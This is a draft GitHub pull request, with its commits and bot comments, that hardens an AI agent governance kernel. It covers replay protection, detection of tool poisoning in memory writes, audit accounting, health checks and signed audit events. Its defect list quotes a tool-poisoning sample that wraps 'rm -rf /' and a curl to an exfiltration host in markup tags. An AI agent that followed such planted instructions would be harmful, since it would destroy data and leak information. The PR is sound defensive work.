fix(agent-os): harden replay, tool-poisoning, audit accounting, health, signed CloudEvents#3247

Draft
liamcrumm wants to merge 2 commits into main from fix/agent-os-security-integrity

@liamcrumm (Contributor)

Summary

Close five agent_os security and integrity gaps so the kernel can be trusted to gate and record untrusted activity. Every defect ships with a test that fails before the change and passes after, and each evidence repro flips from reproducing the defect to no longer reproducing it.

Problem

agent_os had a cluster of governance holes: replay protection that expired early, a memory guard blind to markup-wrapped tool poisoning, an audit event processor that lost events without counting them, a health probe that reported HEALTHY while verifying nothing, and audit events that were plain unsigned dicts rather than signed CloudEvents.

Changes

| File | What changed |
| --- | --- |
| mcp_protocols.py | InMemoryNonceStore.add evicts expired-first and raises NonceStoreCapacityError instead of evicting an in-window nonce; new error type; docstrings updated |
| mcp_message_signer.py | verify_message surfaces capacity saturation as a fail-closed verification failure; cache-size docstring corrected |
| memory_guard.py | New markup-instruction, destructive-command and exfil pattern sets plus AlertType.TOOL_POISONING; MEDIUM alone, HIGH when paired |
| event_sink.py | Lock-guarded submitted/delivered/failed counters (reconcile with dropped); GovernanceEvent.to_cloudevent(); GovernanceEventSigner; StdoutGovernanceSink and OTLPGovernanceSink |
| integrations/health.py | Auto-register built-ins (register_builtins flag), empty report aggregates to UNHEALTHY, audit check reports DEGRADED with no backend |
| __init__.py | Export NonceStoreCapacityError, GovernanceEventSigner, StdoutGovernanceSink, OTLPGovernanceSink |
| tests (6 files) | New regression tests per defect; rewrote tests that encoded the vulnerable behavior |

Defects and repro flips

  1. Nonce-cache replay: count-based eviction dropped in-window nonces, so a replayed message verified as valid again. Now fails closed at capacity. Repro: cache=2, verify 4 msgs, re-verify msg0 -> is_valid=False.
  2. Tool-poisoning gap: <important>...rm -rf / and curl evil.com</important> was allowed=True with 0 alerts. Now allowed=False with a HIGH TOOL_POISONING alert; benign prose stays allowed.
  3. Silent audit loss: events dispatched to a FAILURE or circuit-open sink were drained but counted nowhere. Now submitted == delivered + failed + dropped; a FAILURE sink yields failed=50, not silent loss.
  4. False-healthy probe: HealthChecker().check_health() returned an empty report that aggregated to HEALTHY. Now built-ins auto-register, an empty report aggregates to UNHEALTHY, and the audit check is DEGRADED without a backend.
  5. Unsigned audit: to_dict() lacked id/source/type/specversion and a signature. New to_cloudevent() (ADR-0021, AUDIT-COMPLIANCE-1.0 section 20.4) plus an HMAC signer (the signature covers the algorithm attribute); tampering with data or algorithm fails verification.
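
The fail-closed behavior from defect 1 can be sketched roughly as below. This is a minimal illustration, not the PR's code: SketchNonceStore, its clock parameter, and the add/has signatures are hypothetical stand-ins for InMemoryNonceStore, and only the NonceStoreCapacityError name comes from the change itself.

```python
import time
from collections import OrderedDict


class NonceStoreCapacityError(Exception):
    """Raised when the store is full of nonces still inside the replay window."""


class SketchNonceStore:
    """Hypothetical stand-in for InMemoryNonceStore (names and signatures assumed)."""

    def __init__(self, max_entries, clock=time.monotonic):
        self._max_entries = max_entries
        self._clock = clock  # injectable so tests can control time
        self._expiry = OrderedDict()  # nonce -> expires_at

    def _evict_expired(self):
        now = self._clock()
        # Strict ">" keeps a nonce through the exact expiry instant.
        for nonce in [n for n, exp in self._expiry.items() if now > exp]:
            del self._expiry[nonce]

    def has(self, nonce):
        exp = self._expiry.get(nonce)
        return exp is not None and self._clock() <= exp

    def add(self, nonce, ttl_seconds):
        # Expired entries go first; an in-window nonce is never evicted.
        self._evict_expired()
        if nonce not in self._expiry and len(self._expiry) >= self._max_entries:
            raise NonceStoreCapacityError("nonce store is full of in-window nonces")
        self._expiry[nonce] = self._clock() + ttl_seconds
```

Under this sketch, a caller such as verify_message would treat NonceStoreCapacityError as a verification failure, so saturation rejects new messages instead of forgetting old nonces.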

Design notes and scope

  • Nonce store fails closed at capacity rather than growing unbounded (a pure soft cap would make max_entries a non-bound). Availability tradeoff under saturation is documented; operators raise max_nonce_cache_size or shorten the replay window.
  • to_dict() is intentionally unchanged for AuditBackendSinkAdapter back-compat; the CloudEvents form is the export path per the documented method name to_cloudevent().
  • Health behavior change: the built-in server /health now reports degraded (audit backend not wired into the checker) instead of a false healthy. Readiness stays green because DEGRADED is still ready.
  • Signing key management is out of scope; sinks take a caller-provided signer. The key is never logged.
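
The health behavior described in these notes can be illustrated with a small sketch. The HealthStatus enum, the worst-of aggregation rule, and the function names are assumptions made for illustration; the PR only states that an empty report aggregates to UNHEALTHY, that the audit check is DEGRADED without a backend, and that DEGRADED still counts as ready.

```python
from enum import Enum


class HealthStatus(Enum):
    HEALTHY = "healthy"
    DEGRADED = "degraded"
    UNHEALTHY = "unhealthy"


# Assumed ordering for a worst-of aggregation.
_SEVERITY = {
    HealthStatus.HEALTHY: 0,
    HealthStatus.DEGRADED: 1,
    HealthStatus.UNHEALTHY: 2,
}


def audit_check(backend):
    """DEGRADED when no audit backend is configured (hypothetical helper)."""
    return HealthStatus.HEALTHY if backend is not None else HealthStatus.DEGRADED


def aggregate(component_statuses):
    """An empty report verifies nothing, so it must not count as healthy."""
    if not component_statuses:
        return HealthStatus.UNHEALTHY
    return max(component_statuses, key=lambda status: _SEVERITY[status])


def is_ready(status):
    """Readiness stays green for DEGRADED; only UNHEALTHY fails it."""
    return status is not HealthStatus.UNHEALTHY
```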

Testing

  • ruff check --select E,F,W --ignore E501 clean on all changed files.
  • Targeted pytest for the four touched suites plus consumers (test_server, test_optional_deps_integration, test_core_features, test_spec_audit_compliance_conformance) passes; +21 new tests.
  • All five evidence repros flip before vs after.
  • Full agent-os suite: the 20 pre-existing test_autogen_hooks failures and the agent_sre-missing collection error reproduce on a clean tree and are unrelated to this change.

…h, signed CloudEvents

Close five agent_os security and integrity gaps so the kernel can be trusted
to gate and record untrusted activity. Each defect ships with a test that fails
before the change and passes after.

1. Nonce-cache replay (mcp_protocols / mcp_message_signer). InMemoryNonceStore
   evicted by count via OrderedDict.popitem, dropping nonces still inside the
   replay window and letting messages replay as valid. Eviction is now
   expired-first and fails closed at capacity (NonceStoreCapacityError) rather
   than evicting an in-window nonce, keeping max_entries a real bound.

2. Tool-poisoning coverage (memory_guard). validate_write missed markup-wrapped
   standing instructions carrying destructive shell commands and exfil. Added
   markup-tag, destructive-command and exfil pattern sets and a TOOL_POISONING
   alert. Tags are MEDIUM alone and HIGH when paired with a dangerous payload,
   so benign prose (including a bare curl mention) stays allowed.

3. Event accounting (event_sink.GovernanceEventProcessor). The processor had no
   delivered counter and lost events dispatched to a failing or circuit-open
   sink without counting them. Added lock-guarded submitted, delivered and
   failed counters so submitted == delivered + failed + dropped after shutdown.

4. False-healthy probe (integrations/health). A fresh HealthChecker reported
   HEALTHY with zero components and the audit built-in was an unconditional
   HEALTHY stub. Built-ins now auto-register (register_builtins flag), an empty
   report aggregates to UNHEALTHY, and the audit check reports DEGRADED when no
   backend is configured.

5. Signed CloudEvents (event_sink). GovernanceEvent gains to_cloudevent()
   (CloudEvents 1.0 per ADR-0021 and AUDIT-COMPLIANCE-1.0 section 20.4) plus an
   HMAC GovernanceEventSigner whose signature covers the algorithm attribute,
   and StdoutGovernanceSink and OTLPGovernanceSink. to_dict() is unchanged for
   AuditBackendSinkAdapter back-compat.
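
As a rough sketch of item 5, an HMAC signature can cover the algorithm attribute by including it in the signed payload. SketchEventSigner, the signature and signaturealgorithm attribute names, and the canonical JSON form are all assumptions for illustration; the real GovernanceEventSigner may differ.

```python
import hashlib
import hmac
import json


class SketchEventSigner:
    """Hypothetical HMAC signer; not the PR's GovernanceEventSigner."""

    ALGORITHM = "HMAC-SHA256"

    def __init__(self, key: bytes):
        self._key = key  # caller-provided; never logged or emitted

    def _digest(self, event: dict, algorithm: str) -> str:
        unsigned = {
            k: v for k, v in event.items()
            if k not in ("signature", "signaturealgorithm")
        }
        # The algorithm name is part of the signed payload, so it cannot be
        # swapped without invalidating the signature.
        payload = json.dumps(
            {"algorithm": algorithm, "event": unsigned},
            sort_keys=True,
            separators=(",", ":"),
            default=str,
        )
        return hmac.new(self._key, payload.encode("utf-8"), hashlib.sha256).hexdigest()

    def sign(self, event: dict) -> dict:
        signed = dict(event)  # leave the caller's dict untouched
        signed["signaturealgorithm"] = self.ALGORITHM
        signed["signature"] = self._digest(event, self.ALGORITHM)
        return signed

    def verify(self, event: dict) -> bool:
        algorithm = event.get("signaturealgorithm")
        signature = event.get("signature")
        if algorithm != self.ALGORITHM or not isinstance(signature, str):
            return False
        expected = self._digest(event, algorithm)
        return hmac.compare_digest(signature.encode("utf-8"), expected.encode("utf-8"))
```

The constant-time comparison via hmac.compare_digest avoids leaking how many leading characters of a forged signature matched.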

Validation: ruff check --select E,F,W --ignore E501 clean on changed files;
targeted pytest for the four touched suites plus consumers passes; all five
repros flip.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Signed-off-by: liamcrumm <liamcrumm@microsoft.com>

github-actions Bot commented Jul 2, 2026

PR Review Summary

| Check | Status | Details |
| --- | --- | --- |
| 🔍 Code Review | ⚠️ Missing | No current-run comment |
| 🛡️ Security Scan | ⚠️ Missing | No current-run comment |
| 🔄 Breaking Changes | ⚠️ Missing | No current-run comment |
| 📝 Docs Sync | ⚠️ Missing | No current-run comment |
| 🧪 Test Coverage | ⚠️ Missing | No current-run comment |

Verdict: ⚠️ AI review incomplete; ready for human review

AI review comments are untrusted advisory output. The summary reports workflow-generated completion status only, not model-authored pass/fail claims.

github-actions Bot added the tests label Jul 2, 2026

github-actions Bot commented Jul 2, 2026

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

Scanned Files

None

github-actions Bot added the size/XL (Extra large PR, 500+ lines) label Jul 2, 2026
checker = HealthChecker(version="test")

class _AuditBackend:
    def write(self, entry) -> None: ...

class _AuditBackend:
    def write(self, entry) -> None: ...
    def flush(self) -> None: ...
…, health, docs)

Remediations from a multi-lens deep code review of the security hardening:

- event_sink: spread GovernanceEvent.attributes BEFORE authoritative fields in
  to_cloudevent() so a free-form attribute key can no longer shadow the real
  agent_id/decision/action inside a validly-signed CloudEvent (audit integrity).
- event_sink: CloudEvents type namespace changed from ai.agentmesh.* to
  ai.agentos.* — Agent OS is a distinct producer from Agent Mesh (ADR-0021
  reserves ai.agentmesh.* for the mesh producer); stop inventing mesh-namespaced
  types not in AUDIT-COMPLIANCE 20.4.
- event_sink: signer/sinks serialize with default=str (matches AuditEntry.to_json)
  so a non-JSON-native attribute value no longer aborts the whole batch; derived
  CloudEvents source is percent-encoded.
- event_sink: accounting distinguishes intentional sink DROPPED (bucketed as
  dropped, not failed); OTLPGovernanceSink returns DROPPED (not SUCCESS) when
  OpenTelemetry is absent, and promotes severity/resource/policy_name/session_id
  as searchable OTel metadata alongside the CloudEvent envelope.
- mcp_protocols: nonce retention is inclusive of the exact expiry instant
  (has/cleanup use strict >), matching the verifier's inclusive replay-window
  check, closing a boundary replay at now == expires_at.
- memory_guard: markup tag + a BARE curl/wget is MEDIUM (allowed) not HIGH, to
  stop false-positive blocks of benign tooling runbooks; fork-bomb regex tolerates
  whitespace. Destructive/exfil pairings still block.
- health: removed the unused policy_engine constructor parameter (silently-ignored
  input); documented that the server /health is DEGRADED until a durable audit
  backend is wired.
- docs/spec: CHANGELOG [Unreleased] Security entry; MCP-SECURITY-GATEWAY 7.7/7.9
  now specify capacity fail-closed + inclusive retention; api-reference HealthChecker
  signature and example updated.
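
The accounting remediation above (intentional DROPPED results bucketed separately from failures) might look roughly like this. SinkResult and SketchAccounting are hypothetical names; only the counter names, the SUCCESS/FAILURE/DROPPED outcomes, and the invariant come from the change description.

```python
import threading
from enum import Enum


class SinkResult(Enum):
    SUCCESS = "success"
    FAILURE = "failure"
    DROPPED = "dropped"  # intentional drop, e.g. optional dependency absent


class SketchAccounting:
    """Hypothetical lock-guarded counters for a governance event processor."""

    def __init__(self):
        self._lock = threading.Lock()
        self.submitted = 0
        self.delivered = 0
        self.failed = 0
        self.dropped = 0

    def record_submitted(self):
        with self._lock:
            self.submitted += 1

    def record_result(self, result):
        # Every dispatched event lands in exactly one bucket.
        with self._lock:
            if result is SinkResult.SUCCESS:
                self.delivered += 1
            elif result is SinkResult.DROPPED:
                self.dropped += 1
            else:
                self.failed += 1

    def reconciles(self):
        """True when submitted == delivered + failed + dropped."""
        with self._lock:
            return self.submitted == self.delivered + self.failed + self.dropped
```

In this sketch the invariant only holds once every submitted event has a recorded result, which matches the description's "after shutdown" qualifier.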

Tests: +new regressions for each finding; targeted + conformance suites pass
(381), full agent-os suite unchanged vs baseline (4804 passed; pre-existing
agent_sre/autogen env failures only). ruff clean on changed files.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Signed-off-by: liamcrumm <liamcrumm@microsoft.com>
github-actions Bot added the documentation (Improvements or additions to documentation) label Jul 2, 2026
Labels

documentation (Improvements or additions to documentation), size/XL (Extra large PR, 500+ lines), tests
